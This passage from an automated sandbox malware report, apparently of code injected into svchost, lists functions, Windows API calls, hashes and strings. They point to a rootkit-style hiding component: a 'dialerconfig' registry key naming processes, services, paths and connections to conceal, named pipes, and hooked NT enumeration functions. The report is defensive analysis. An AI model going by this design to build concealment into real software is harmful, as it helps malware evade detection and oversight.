Part of subcall function 0000025304FB1650: RegOpenKeyExW.ADVAPI32 ref: 0000025304FB17F2

Sleep.KERNEL32 ref: 0000025304FB1C43
SleepEx.KERNELBASE ref: 0000025304FB1C49

Part of subcall function 0000025304FB1650: RegCloseKey.ADVAPI32 ref: 0000025304FB180D
Part of subcall function 0000025304FB1650: RegOpenKeyExW.ADVAPI32 ref: 0000025304FB182D
Part of subcall function 0000025304FB1650: RegCloseKey.ADVAPI32 ref: 0000025304FB1848
Part of subcall function 0000025304FB1650: RegOpenKeyExW.ADVAPI32 ref: 0000025304FB1868
Part of subcall function 0000025304FB1650: RegCloseKey.ADVAPI32 ref: 0000025304FB1883
Part of subcall function 0000025304FB1650: RegOpenKeyExW.ADVAPI32 ref: 0000025304FB18A3
Part of subcall function 0000025304FB1650: RegCloseKey.ADVAPI32 ref: 0000025304FB18BE
Part of subcall function 0000025304FB1650: RegCloseKey.ADVAPI32 ref: 0000025304FB18C8

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 28fabf696d26ef73d3be29b0d2e182dae72c1de69f6a42b4190a79ea946628d1
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: EB31AF76200F0191FA50DB26DF7D35A22A5AB4ABE7F1464219E09876D5DF34CB6082F8

Function 0000025304F82908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000025304F82A31

Memory Dump Source

Source File: 0000000C.00000002.2636784109.0000025304F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304F80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304f80000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 5f2ebb6ed0f7fd16517ced7d3f9d98b76cb44d1d83ea2180a75d84866868253c
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 68613172702B5087EA68CF15D84876CB391FB44BE5F469029DA190B7C5DB38EB62C728

Non-executed Functions

Function 0000025304FB2CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000025304FB2D80
lstrlenW.KERNEL32 ref: 0000025304FB2FBA

Part of subcall function 0000025304FB1A14: OpenProcess.KERNEL32 ref: 0000025304FB1A3A
Part of subcall function 0000025304FB1A14: K32GetModuleFileNameExW.KERNEL32 ref: 0000025304FB1A58
Part of subcall function 0000025304FB1A14: PathFindFileNameW.SHLWAPI ref: 0000025304FB1A67
Part of subcall function 0000025304FB1A14: lstrlenW.KERNEL32 ref: 0000025304FB1A73
Part of subcall function 0000025304FB1A14: StrCpyW.SHLWAPI ref: 0000025304FB1A86
Part of subcall function 0000025304FB1A14: CloseHandle.KERNEL32 ref: 0000025304FB1A94

GetProcAddress.KERNEL32 ref: 0000025304FB2D95

Part of subcall function 0000025304FB1554: StrCmpIW.SHLWAPI ref: 0000025304FB1585

Part of subcall function 0000025304FB3930: StrCmpNIW.SHLWAPI ref: 0000025304FB3948

StrCmpNIW.SHLWAPI ref: 0000025304FB2DD8
lstrlenW.KERNEL32 ref: 0000025304FB2F00

Strings

NtQueryObject, xrefs: 0000025304FB2D8B
ntdll.dll, xrefs: 0000025304FB2D79
\Device\Nsi, xrefs: 0000025304FB2DCB

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 6e38e6e88eea62fa903dc9e1b1c45396e63af638434ea9b3b35fe69c5e72ccc2
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: D7B19C32210F5082EB64DF25CD4C7A963A4FB46BEAF556056EE09537D4DB35CB40C3A4

Function 0000025304FB7E70 Relevance: 10.6, APIs: 7, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000025304FB7E8C
RtlCaptureContext.NTDLL ref: 0000025304FB7EB9
RtlLookupFunctionEntry.NTDLL ref: 0000025304FB7ED3
RtlVirtualUnwind.NTDLL ref: 0000025304FB7F14
IsDebuggerPresent.KERNEL32 ref: 0000025304FB7F68
SetUnhandledExceptionFilter.KERNEL32 ref: 0000025304FB7F89
UnhandledExceptionFilter.KERNEL32 ref: 0000025304FB7F94

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 1da9f3377175899e6c3d1154d9199a8308e37632685a3200987f5f2287a1cb32
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 2A313A72204F8086EB60DF60EC443EA73A4F785795F44942ADA4D47A98EF38C748C768

Function 0000025304FBB50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000025304FBB585
RtlLookupFunctionEntry.NTDLL ref: 0000025304FBB59D
RtlVirtualUnwind.NTDLL ref: 0000025304FBB5D8
IsDebuggerPresent.KERNEL32 ref: 0000025304FBB611
SetUnhandledExceptionFilter.KERNEL32 ref: 0000025304FBB61B
UnhandledExceptionFilter.KERNEL32 ref: 0000025304FBB626

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 692c19c8f0d15043dc364f1b160d9c86281d23f045ee11e63077677c892c1e53
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 4D314732204F8086EB60DF25EC4439E73A4F7897A5F505126EA9D43BA9DF38C7458B54

Function 0000025304FBFEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000025304FBFF67
WriteFile.KERNEL32 ref: 0000025304FC021E
WriteFile.KERNEL32 ref: 0000025304FC0270
GetLastError.KERNEL32 ref: 0000025304FC0372
GetLastError.KERNEL32 ref: 0000025304FC03D2

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 55a9e84bc26dc822ed22ea03daf4bad879445ad9414bcf266157f4bdbc86f363
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 92E1EC32A04B808AE700CFA4D9882DE7BB1F3457E9F10A116DE4A57BD9DE38C71AC754

Function 0000025304FB1650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000025304FB165B
HeapAlloc.KERNEL32 ref: 0000025304FB166A

Part of subcall function 0000025304FB1274: GetProcessHeap.KERNEL32 ref: 0000025304FB127A
Part of subcall function 0000025304FB1274: HeapAlloc.KERNEL32 ref: 0000025304FB1289
Part of subcall function 0000025304FB1274: GetProcessHeap.KERNEL32 ref: 0000025304FB12A3
Part of subcall function 0000025304FB1274: HeapAlloc.KERNEL32 ref: 0000025304FB12B4

RegOpenKeyExW.ADVAPI32 ref: 0000025304FB16DA
RegOpenKeyExW.ADVAPI32 ref: 0000025304FB1707
RegCloseKey.ADVAPI32 ref: 0000025304FB1721
RegOpenKeyExW.ADVAPI32 ref: 0000025304FB1741
RegCloseKey.ADVAPI32 ref: 0000025304FB175C
RegOpenKeyExW.ADVAPI32 ref: 0000025304FB177C
RegCloseKey.ADVAPI32 ref: 0000025304FB1797
RegOpenKeyExW.ADVAPI32 ref: 0000025304FB17B7
RegCloseKey.ADVAPI32 ref: 0000025304FB17D2
RegOpenKeyExW.ADVAPI32 ref: 0000025304FB17F2
RegCloseKey.ADVAPI32 ref: 0000025304FB180D
RegOpenKeyExW.ADVAPI32 ref: 0000025304FB182D
RegCloseKey.ADVAPI32 ref: 0000025304FB1848
RegOpenKeyExW.ADVAPI32 ref: 0000025304FB1868
RegCloseKey.ADVAPI32 ref: 0000025304FB1883
RegOpenKeyExW.ADVAPI32 ref: 0000025304FB18A3
RegCloseKey.ADVAPI32 ref: 0000025304FB18BE
RegCloseKey.ADVAPI32 ref: 0000025304FB18C8

Part of subcall function 0000025304FB12C8: RegQueryInfoKeyW.ADVAPI32 ref: 0000025304FB1326
Part of subcall function 0000025304FB12C8: GetProcessHeap.KERNEL32 ref: 0000025304FB1334
Part of subcall function 0000025304FB12C8: HeapAlloc.KERNEL32 ref: 0000025304FB1345
Part of subcall function 0000025304FB12C8: RegEnumValueW.ADVAPI32 ref: 0000025304FB13A1
Part of subcall function 0000025304FB12C8: GetProcessHeap.KERNEL32 ref: 0000025304FB13E9
Part of subcall function 0000025304FB12C8: HeapAlloc.KERNEL32 ref: 0000025304FB13F7
Part of subcall function 0000025304FB12C8: GetProcessHeap.KERNEL32 ref: 0000025304FB141B
Part of subcall function 0000025304FB12C8: HeapFree.KERNEL32 ref: 0000025304FB1429
Part of subcall function 0000025304FB12C8: lstrlenW.KERNEL32 ref: 0000025304FB1432
Part of subcall function 0000025304FB12C8: GetProcessHeap.KERNEL32 ref: 0000025304FB1440
Part of subcall function 0000025304FB12C8: HeapAlloc.KERNEL32 ref: 0000025304FB144E

Strings

service_names, xrefs: 0000025304FB17EB
process_names, xrefs: 0000025304FB1775
pid, xrefs: 0000025304FB173A
startup, xrefs: 0000025304FB16FD
tcp_local, xrefs: 0000025304FB1826
tcp_remote, xrefs: 0000025304FB1861
udp, xrefs: 0000025304FB189C
paths, xrefs: 0000025304FB17B0
SOFTWARE\dialerconfig, xrefs: 0000025304FB16BA

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: a2edbb92a12934b173d6cfef0105b9dafe3abf162c4848495658ce8bfa164145
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 8F712836710F5086EB10DF65ED5869923B4FB89BEAF00A111DE4D43AA8DF38C744C358

Function 0000025304FB12C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000025304FB1326
GetProcessHeap.KERNEL32 ref: 0000025304FB1334
HeapAlloc.KERNEL32 ref: 0000025304FB1345
RegEnumValueW.ADVAPI32 ref: 0000025304FB13A1

Part of subcall function 0000025304FB1554: StrCmpIW.SHLWAPI ref: 0000025304FB1585

GetProcessHeap.KERNEL32 ref: 0000025304FB13E9
HeapAlloc.KERNEL32 ref: 0000025304FB13F7
GetProcessHeap.KERNEL32 ref: 0000025304FB141B
HeapFree.KERNEL32 ref: 0000025304FB1429
lstrlenW.KERNEL32 ref: 0000025304FB1432
GetProcessHeap.KERNEL32 ref: 0000025304FB1440
HeapAlloc.KERNEL32 ref: 0000025304FB144E
StrCpyW.SHLWAPI ref: 0000025304FB1470
GetProcessHeap.KERNEL32 ref: 0000025304FB1485
HeapFree.KERNEL32 ref: 0000025304FB1493

Strings

d, xrefs: 0000025304FB1365

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 9b17d36955c07c341c5d2b14c8a70b4d1944a69e128c9ee30e41f6913bf8c5a6
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: D7516A72614F44D7EB14CF62EA4839AB3A1F78ABE1F049124DE8907B94DF38C255C754

Function 0000025304FB1EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000025304FB1EBF

Part of subcall function 0000025304FB2174: GetModuleHandleA.KERNEL32 ref: 0000025304FB218C
Part of subcall function 0000025304FB2174: GetProcAddress.KERNEL32 ref: 0000025304FB219D

Part of subcall function 0000025304FB5C10: GetCurrentThreadId.KERNEL32 ref: 0000025304FB5C4B

Strings

sechost.dll, xrefs: 0000025304FB1FD9
NtQueryDirectoryFileEx, xrefs: 0000025304FB1F3C
NtEnumerateValueKey, xrefs: 0000025304FB1F76
NtQuerySystemInformation, xrefs: 0000025304FB1EE5
advapi32.dll, xrefs: 0000025304FB1F97, 0000025304FB1FB8
ntdll.dll, xrefs: 0000025304FB1ECD
NtDeviceIoControlFile, xrefs: 0000025304FB1FF6
NtResumeThread, xrefs: 0000025304FB1F02
NtQueryDirectoryFile, xrefs: 0000025304FB1F1F
NtEnumerateKey, xrefs: 0000025304FB1F59
EnumServiceGroupW, xrefs: 0000025304FB1F90
EnumServicesStatusExW, xrefs: 0000025304FB1FB1, 0000025304FB1FD2

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: a5924dd38a659aeca1aa0a951421a5c5b15de6974fc8942f7820ccfb0c60c971
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 4F31D6B4600F0AA0EB09DFA5EE5E3D43321A7453E7F81B5539519126F29E388349C3B8

Function 0000025304FB23F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000025304FB2405
GetCurrentProcessId.KERNEL32 ref: 0000025304FB240F

Part of subcall function 0000025304FB19AC: OpenProcess.KERNEL32 ref: 0000025304FB19CA
Part of subcall function 0000025304FB19AC: IsWow64Process.KERNEL32 ref: 0000025304FB19E0
Part of subcall function 0000025304FB19AC: CloseHandle.KERNEL32 ref: 0000025304FB19FB

CreateFileW.KERNEL32 ref: 0000025304FB2468
WriteFile.KERNEL32 ref: 0000025304FB2490
ReadFile.KERNEL32 ref: 0000025304FB24AF
CloseHandle.KERNEL32 ref: 0000025304FB24B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 0000025304FB243F
\\.\pipe\dialerchildproc64, xrefs: 0000025304FB2438

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 4e26eff6795f1e7f59177484dd760ecd6697f4f1484279a534c3adfd140af75b
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: C3211A36614B4482EB10CB25EA4C35A77A0F789BEAF509215EA5902FE8DF3CC349CB15

Function 0000025304FB104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000025304FB10AB
RegEnumValueW.ADVAPI32 ref: 0000025304FB110E
GetProcessHeap.KERNEL32 ref: 0000025304FB1155
HeapAlloc.KERNEL32 ref: 0000025304FB1163
GetProcessHeap.KERNEL32 ref: 0000025304FB1187
HeapFree.KERNEL32 ref: 0000025304FB1195

Strings

d, xrefs: 0000025304FB10CE

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 341be3bcaca8e4c3736cf7df8ef77672136a1ea2008ce0ee53acfeddab16131a
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 01419033614B809BE760CF62E94839AB7A5F389BD5F009125DB8907B98DF38D264CB54

Function 0000025304FB75F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000025304FB7618
__scrt_acquire_startup_lock.LIBCMT ref: 0000025304FB766A
_RTC_Initialize.LIBCMT ref: 0000025304FB7698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000025304FB76BE
__scrt_release_startup_lock.LIBCMT ref: 0000025304FB76E9

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 908f8819758c0405c579d0194b70f3e90f69305c4fefd8e7bd3e3c62ed705d36
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 5881C130B00F4186FB54FB6A9C4935962D1ABC77E2F24B4259E44477D6DB38CB4187B8

Function 0000025304F869F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000025304F86A18
__scrt_acquire_startup_lock.LIBCMT ref: 0000025304F86A6A
_RTC_Initialize.LIBCMT ref: 0000025304F86A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000025304F86ABE
__scrt_release_startup_lock.LIBCMT ref: 0000025304F86AE9

Memory Dump Source

Source File: 0000000C.00000002.2636784109.0000025304F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304F80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304f80000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 7cb95ab0005a322a8c6a5e3b6ca98b83a4af0bfa4bbc3b3f7661b6430dce61ed
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 6C81F121600F8187FA50EB269C4935922D0EB967E3F14602DAA05CF7D6DB38CB668738

Function 0000025304FB9804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 0000025304FB9889
GetLastError.KERNEL32 ref: 0000025304FB9897
LoadLibraryExW.KERNEL32 ref: 0000025304FB98C1
FreeLibrary.KERNEL32 ref: 0000025304FB9907
GetProcAddress.KERNEL32 ref: 0000025304FB9913

Strings

api-ms-, xrefs: 0000025304FB98A9

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: de185f3a4916564fc56364fdf172a44b4c2ea4b36ec3212d2863ad6f0c3a5fd0
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 7231F472302F4091FE52DB02AC08B992394BB0ABF6F596524DE6D473C4EF78C3458768

Function 0000025304FC1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteConsoleW.KERNEL32 ref: 0000025304FC1BCD
GetLastError.KERNEL32 ref: 0000025304FC1BD9
CloseHandle.KERNEL32 ref: 0000025304FC1BF1
CreateFileW.KERNEL32 ref: 0000025304FC1C1C
WriteConsoleW.KERNEL32 ref: 0000025304FC1C3B

Strings

CONOUT$, xrefs: 0000025304FC1BFD

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 1f6b1b0a87bfb9f4fde6206021ee2629552ed926203bae9f697805ca254bdd9a
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 58115B22614F4086E750CB56EE4835962A0F788BFAF04A224EE5987BD4DB78CB148758

Function 0000025304FB5C10 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 0000025304FB5C4B
GetThreadContext.KERNEL32 ref: 0000025304FB5DB5

Part of subcall function 0000025304FB5A40: GetCurrentThreadId.KERNEL32 ref: 0000025304FB5A44

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: 759198d8d6c4d108c050b88fbfc782b609783f07715a0fe92259dec7b2a94b7a
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 1ED1BC76208F8881DA70DB1AE89435A77A0F3C9BD9F105116EA8D47BA5CF3CC741CB54

Function 0000025304FB30B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000025304FB30D7
HeapAlloc.KERNEL32 ref: 0000025304FB30EA
StrCmpNIW.SHLWAPI ref: 0000025304FB316B
GetProcessHeap.KERNEL32 ref: 0000025304FB31D1
HeapFree.KERNEL32 ref: 0000025304FB31DF

Strings

dialer, xrefs: 0000025304FB3164

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: b804e1cbaa629f32825eba2626bbc09a8a8ac9faaa89b1fd146f1ed92ba7e5d3
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 9F31C431B01F5186EB11DF16ED0836963A4FB45BE6F04A1209F4807B95EF38D7A5C798

Function 0000025304FB1A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000025304FB1A3A
K32GetModuleFileNameExW.KERNEL32 ref: 0000025304FB1A58
PathFindFileNameW.SHLWAPI ref: 0000025304FB1A67
lstrlenW.KERNEL32 ref: 0000025304FB1A73
StrCpyW.SHLWAPI ref: 0000025304FB1A86
CloseHandle.KERNEL32 ref: 0000025304FB1A94

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 2984ae07a048d58245a482cc1bb410a837a662bb8bf73f834388467e3972f8c8
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 85015731700F4196EA14DB12E95835963A5F788FE2F48C135CE89837A4DE38CB898364

Function 0000025304FB37AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000025304FB37C8
GetCurrentProcess.KERNEL32 ref: 0000025304FB37D6
VirtualProtectEx.KERNEL32 ref: 0000025304FB37F8
GetCurrentProcess.KERNEL32 ref: 0000025304FB3819
